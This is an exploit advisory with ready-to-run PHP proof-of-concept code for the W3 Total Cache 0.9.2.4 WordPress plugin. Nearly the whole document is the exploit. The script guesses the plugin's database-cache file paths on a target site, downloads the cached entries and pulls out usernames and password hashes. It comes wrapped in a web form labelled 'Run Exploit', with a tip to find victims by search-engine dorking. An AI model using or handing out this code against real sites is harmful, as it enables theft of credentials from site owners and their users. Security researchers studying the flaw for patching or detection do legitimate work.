=============================================================================================================================================
| # Title     : WordPress W3 Total Cache 0.9.2.4 Hash disclor vulnerability                                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.WordPress.org/                                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code is an exploit for the W3 Total Cache plugin for WordPress, which searches for user data stored in the database cache and retrieves usernames and password hashes.
   
   (linked: https://packetstorm.news/files/id/180672/ Linked CVE numbers: ),
	
[+] save code as poc.php.

[+] USage : http://127.0.0.1/poc.php 

[+] PayLoad :

<?php

set_time_limit(300); // تحديد الحد بـ 300 ثانية

class WordpressW3TCExploit {
    private $tablePrefix;
    private $siteIterations;
    private $userIterations;
    private $targetUrl;

    public function __construct($targetUrl, $tablePrefix = 'wp_', $siteIterations = 25, $userIterations = 25) {
        $this->tablePrefix = $tablePrefix;
        $this->siteIterations = $siteIterations;
        $this->userIterations = $userIterations;
        $this->targetUrl = rtrim($targetUrl, '/');
    }

    private function sendRequest($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    private function cacheUserInfo($userId) {
        $url = $this->targetUrl . "/?author=" . $userId;
        $this->sendRequest($url);
    }

    private function md5Hash($string) {
        return md5($string);
    }

    public function run() {
        $usersFound = false;
        $results = "";

        for ($siteId = 1; $siteId <= $this->siteIterations; $siteId++) {
            $results .= "Trying site_id {$siteId}...<br>";

            for ($userId = 1; $userId <= $this->userIterations; $userId++) {
                $results .= "Trying user_id {$userId}...<br>";

                $this->cacheUserInfo($userId);
                $query = "SELECT * FROM {$this->tablePrefix}users WHERE ID = '{$userId}'";
                $queryMd5 = $this->md5Hash($query);
                $key = "w3tc_" . parse_url($this->targetUrl, PHP_URL_HOST) . "_{$siteId}_sql_{$queryMd5}";
                $keyMd5 = $this->md5Hash($key);
                $hashPath = "{$keyMd5[0]}/{$keyMd5[1]}/{$keyMd5[2]}/{$keyMd5}";
                $url = "{$this->targetUrl}/wp-content/w3tc/dbcache/{$hashPath}";

                $result = $this->sendRequest($url);

                if (!$result) {
                    $results .= "No response received<br>";
                    continue;
                }

                if (preg_match('/.*"user_login";s:\d+:"([^"]*)";s:\d+:"user_pass";s:\d+:"([^"]*)".*/', $result, $matches)) {
                    $results .= "<strong>Found:</strong> Username: {$matches[1]} | Password Hash: {$matches[2]}<br>";
                    $usersFound = true;
                }
            }
        }

        if (!$usersFound) {
            $results .= "<strong>No users found :(</strong><br>";
        }
        return $results;
    }
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $target = $_POST['target_url'];
    $exploit = new WordpressW3TCExploit($target);
    $result = $exploit->run();
} else {
    $result = "";
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>WordPress W3TC Exploit</title>
</head>
<body>
    <h2>WordPress W3TC Exploit</h2>
    <form method="POST">
        <label for="target_url">Target URL:</label>
        <input type="text" name="target_url" required>
        <button type="submit">Run Exploit</button>
    </form>
    <h3>Results:</h3>
    <div><?php echo $result; ?></div>
</body>
</html>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================